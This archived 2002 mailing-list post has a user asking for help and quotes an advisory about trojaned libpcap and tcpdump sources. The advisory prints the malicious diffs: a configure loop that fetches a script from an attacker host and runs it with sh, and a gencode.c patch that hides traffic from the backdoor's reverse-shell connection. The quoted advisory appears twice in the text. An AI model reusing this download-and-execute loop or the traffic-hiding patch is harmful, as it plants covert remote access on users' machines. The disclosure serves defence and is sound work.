Ethereal-users: RE: [Ethereal-users] IMPORTANT !!!
Note: This archive is from the project's previous web site, ethereal.com. This list is no longer active.
From: "Maiale, Anthony" <AMaiale@xxxxxxxxxxxxxxxxxxxxx>
Date: Thu, 14 Nov 2002 16:07:19 -0500
Hi, I just downloaded Winpcap 2.3 and Ethereal 0.9.7 two days ago. I am an end-user-(I just use the software out of the box as is) and this is my first experience with Ethereal. Do I need to do something about this Trojan horse. I did a search in my registry for tcpdump.* and libpcap.* I did find the libpcap.* within my registry. Please help/advise!! Thanks, Tony -----Original Message----- From: COLIN Stéphane [mailto:scolin@xxxxxxxxxxxx] Sent: Thursday, November 14, 2002 2:37 PM To: Mailing List Ethereal Users Subject: [Ethereal-users] IMPORTANT !!! To all users using ethereal, check yours libpcap & tcpdump sources !!! Reference : http://hlug.fscker.com/ Latest libpcap & tcpdump sources from tcpdump.org contain a trojan. Background: * Libpcap provides a packet sniffing library for programs like Snort. * Tcpdump is a standard tool for packet sniffing. Details: * The trojan contains modifications to the configure script and gencode.c (in libpcap only). * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: o A - program exits o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. o M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. * This is similar to the OpenSSH trojan a few months ago. Updates: * Many Mirrors are infected with the trojan!!! * Main Mirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out. Good sources: http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7. 1.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6. 2.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7. 1.tar.gz MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget To all users using ethereal, check yours libpcap & tcpdump sources !!! Reference : http://hlug.fscker.com/ Latest libpcap & tcpdump sources from tcpdump.org contain a trojan. Background: * Libpcap provides a packet sniffing library for programs like Snort. * Tcpdump is a standard tool for packet sniffing. Details: * The trojan contains modifications to the configure script and gencode.c (in libpcap only). * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: o A - program exits o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. o M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. * This is similar to the OpenSSH trojan a few months ago. Updates: * Many Mirrors are infected with the trojan!!! * Main Mirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out. Good sources: http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7. 1.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6. 2.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7. 1.tar.gz MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1>/dev/null 2>/dev/null & The "services" payload: * trojan-script, the non-obfuscated portion (excerpted) * services, the complete version Thanks to: Russell Adams <rladams@NO_SPAMadamsinfoserv.com> Mathew Solnik <msolnik@NO_SPAMhlug.org> Scott Stout <skout@NO_SPAMwiretapped.us> with the Houston Linux Users Group. Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums. Last update: Wed Nov 13 03:44:08 CST 2002 -- ----------------------------------- COLIN Stephane, scolin@xxxxxxxxxxxx ----------------------------------- _______________________________________________ Ethereal-users mailing list Ethereal-users@xxxxxxxxxxxx http://www.ethereal.com/mailman/listinfo/ethereal-users
- Follow-Ups:
- Re: [Ethereal-users] IMPORTANT !!!
- From: Guy Harris
- Re: [Ethereal-users] IMPORTANT !!!
- Prev by Date: Re: [Ethereal-users] Problem compiling 0.9.7
- Next by Date: Re: [Ethereal-users] IMPORTANT !!!
- Previous by thread: [Ethereal-users] IMPORTANT !!!
- Next by thread: Re: [Ethereal-users] IMPORTANT !!!
- Index(es):